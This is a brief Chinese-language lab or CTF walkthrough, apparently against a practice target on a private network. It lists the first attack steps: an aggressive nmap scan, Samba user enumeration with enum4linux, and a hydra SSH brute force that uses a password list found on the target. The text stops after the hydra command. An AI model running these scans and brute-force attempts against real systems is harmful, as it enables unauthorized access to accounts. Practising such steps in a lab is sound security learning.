kali:192.168.111.111
靶机:192.168.111.212
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.212
对samba服务进行枚举发现三个系统用户
enum4linux -a 192.168.111.212
在7601端口下的secret目录发现password.lst密码字典,配合收集到的系统用户爆破ssh
hydra -L user.txt -P password.txt 192.168.111.212 -s 22 ssh -t